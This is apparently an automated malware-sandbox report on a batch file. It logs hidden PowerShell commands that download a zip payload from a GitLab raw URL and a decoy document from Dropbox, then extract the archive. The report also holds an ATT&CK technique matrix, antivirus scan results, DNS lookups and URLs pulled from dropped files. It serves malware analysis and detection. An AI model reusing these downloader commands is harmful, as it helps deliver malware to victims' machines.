            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_advertising_campaign_and_collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'c:\users\user~1\appdata\local\temp\\18_advertising_campaign_and_collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18fukrun.zip', 'c:\users\public\document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_advertising_campaign_and_collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'c:\users\user~1\appdata\local\temp\\18_advertising_campaign_and_collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden -command "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; (new-object -typename system.net.webclient).downloadfile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18fukrun.zip', 'c:\users\public\document.zip')"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information11
            Scripting
            Valid Accounts1
            Command and Scripting Interpreter
            11
            Scripting
            11
            Process Injection
            1
            Masquerading
            OS Credential Dumping11
            Security Software Discovery
            Remote Services11
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            PowerShell
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            31
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Process Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Process Injection
            Security Account Manager31
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Obfuscated Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture3
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            18cut04.bat5%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\Public\Document\Lib\email\_encoded_words.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\_header_value_parser.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\_policybase.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\mime\text.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\parser.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\policy.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\quoprimime.py0%ReversingLabs
            C:\Users\Public\Document\Lib\email\utils.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\__init__.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\aliases.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\ascii.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\base64_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\bz2_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\charmap.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp037.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1006.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1026.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1125.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1140.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1250.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1251.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1252.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1253.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1254.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1255.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1256.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1257.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp1258.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp273.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp424.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp437.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp500.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp720.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp737.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp775.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp850.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp852.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp855.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp856.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp857.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp858.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp860.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp861.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp862.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp863.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp864.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp865.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp866.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp869.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp874.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\cp875.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\hex_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\hp_roman8.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\idna.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_1.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_10.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_11.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_13.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_14.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_15.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_16.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_2.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_3.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_4.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_5.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_6.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_7.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_8.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\iso8859_9.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_r.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_t.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\koi8_u.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\kz1048.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\latin_1.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_croatian.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_cyrillic.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_greek.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_iceland.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_latin2.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_roman.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_romanian.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mac_turkish.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\mbcs.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\oem.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\palmos.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\ptcp154.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\punycode.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\quopri_codec.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\raw_unicode_escape.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\rot_13.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\tis_620.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\undefined.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\unicode_escape.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16_be.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_16_le.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32_be.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_32_le.py0%ReversingLabs
            C:\Users\Public\Document\Lib\encodings\utf_7.py0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://pyvideo.org/video/289/pycon-2010--mastering-python-3-i-o0%Avira URL Cloudsafe
            http://www.apache.oF0%Avira URL Cloudsafe
            https://bugs.python.org/issue31000%Avira URL Cloudsafe
            http://bugs.python.org/issue221070%Avira URL Cloudsafe
            https://pyvideo.org/video/1768/the-guts-of-unicode-in-python0%Avira URL Cloudsafe
            http://bugs.python.org/issue197340%Avira URL Cloudsafe
            http://bugs.python.org/issue25280%Avira URL Cloudsafe
            https://peps.python.org/pep-0342/0%Avira URL Cloudsafe
            https://peps.python.org/pep-0475/0%Avira URL Cloudsafe
            http://127.0.0.1/spammity/spam?say=ni0%Avira URL Cloudsafe
            http://127.0.0.1/spammity/spam;cookie=12340%Avira URL Cloudsafe
            https://peps.python.org/pep-0526/0%Avira URL Cloudsafe
            https://officeapps-df.live.com0%Avira URL Cloudsafe
            https://peps.python.org/pep-0387/0%Avira URL Cloudsafe
            https://peps.python.org/pep-0484/0%Avira URL Cloudsafe
            https://docs.sandbox.google.com/document/fsip/0%Avira URL Cloudsafe
            http://127.0.0.1/spam0%Avira URL Cloudsafe
            http://%s/not/found.h0%Avira URL Cloudsafe
            http://127.0.0.1/0%Avira URL Cloudsafe
            https://asttokens.readthedocs.io/en/latest/user-guide.html0%Avira URL Cloudsafe
            http://bugs.python.org/issue200530%Avira URL Cloudsafe
            https://app.hellofax.com/0%Avira URL Cloudsafe
            http://idlefork.sourceforge.net0%Avira URL Cloudsafe
            http://www.pythontest.net/redir/with_frag/0%Avira URL Cloudsafe
            http://tix.sourceforge.net.0%Avira URL Cloudsafe
            https://nedbatchelder.com/text/unipain.html0%Avira URL Cloudsafe
            https://www.hellofax.com/0%Avira URL Cloudsafe
            http://127.0.0.1/sp%E4m0%Avira URL Cloudsafe
            https://www.zytrax.com/tech/survival/asn1.html0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            edge-block-www-env.dropbox-dns.com
            162.125.66.15
            truefalse
              high
              gitlab.com
              172.65.251.78
              truefalse
                high
                ipinfo.io
                34.117.59.81
                truefalse
                  high
                  www-env.dropbox-dns.com
                  162.125.66.18
                  truefalse
                    high
                    www.dropbox.com
                    unknown
                    unknownfalse
                      high
                      ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com
                      unknown
                      unknownfalse
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.oFpowershell.exe, 00000011.00000002.2549782222.0000022FF0E51000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://docs.python.org/3/library/asyncio-policy.htmlasyncio-policy.html.17.drfalse
                          high
                          https://gitlab.com/-/sandbox/;powershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://github.com/python/cpython/blob/main/Doc/library/contextvars.rstcontextvars.html.17.drfalse
                              high
                              https://www.dropbox.com/scl/fi/2xk4dviogo9yospowershell.exe, 0000000D.00000002.1400342987.000001876A118000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://docs.python.org/3/library/audit_events.htmlaudit_events.html.17.drfalse
                                  high
                                  https://github.com/python/cpython/blob/main/Doc/library/email.charset.rstemail.charset.html.17.drfalse
                                    high
                                    https://paper.dropbox.com/cloud-docs/editpowershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://github.com/aio-libs/aiohttp/discussions/6044powershell.exe, 00000011.00000002.2448283371.0000022F807D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://datatracker.ietf.org/doc/html/rfc3339.htmllogging.html.17.drfalse
                                          high
                                          https://collector.prd-278964.gl-product-analytics.compowershell.exe, 0000000F.00000002.1530028772.0000023E01626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://github.com/python/cpython/tree/3.12/Lib/asyncio/runners.pyasyncio-runner.html.17.drfalse
                                              high
                                              https://pyvideo.org/video/289/pycon-2010--mastering-python-3-i-ounicode.html.17.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://bugs.python.org/issue22107filesystem.py.17.drfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://www.dropbox.com/powershell.exe, 0000000D.00000002.1380394770.0000018753593000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875356F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1380394770.000001875358F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://pyvideo.org/video/1768/the-guts-of-unicode-in-pythonunicode.html.17.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://github.com/python/cpython/blob/main/Doc/library/asyncio-sync.rstasyncio-sync.html.17.drfalse
                                                  high
                                                  https://github.com/python/cpython/blob/main/Doc/library/datatypes.rstdatatypes.html.17.drfalse
                                                    high
                                                    https://bugs.python.org/issue3100test_weakref.py.17.drfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://github.com/python/cpython/blob/main/Doc/howto/isolating-extensions.rstisolating-extensions.html.17.drfalse
                                                      high
                                                      https://github.com/textualizepowershell.exe, 00000011.00000002.2448283371.0000022F80901000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://docs.python.org/3/howto/unicode.htmlunicode.html.17.drfalse
                                                          high
                                                          https://github.com/python/cpython/blob/main/Doc/library/bdb.rstbdb.html.17.drfalse
                                                            high
                                                            https://nuget.org/nuget.exepowershell.exe, 0000000D.00000002.1380394770.000001875392C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.00000187620F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1397199570.0000018761FB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E101B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1583417160.0000023E10074000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2536038120.0000022F90072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://bugs.python.org/issue19734__init__.py25.17.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963ssl_.py.17.drfalse
                                                                high
                                                                https://peps.python.org/pep-0342/functional.html.17.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://bugs.python.org/issue2528filesystem.py.17.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://github.com/python/cpython/tree/3.12/Lib/html/__init__.pyhtml.html.17.drfalse
                                                                  high
                                                                  http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000D.00000002.1380394770.00000187535AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://peps.python.org/pep-0475/exceptions.html.17.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://127.0.0.1/spammity/spam?say=nitest_wsgiref.py.17.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.unicode.org/history/unicode.html.17.drfalse
                                                                      high
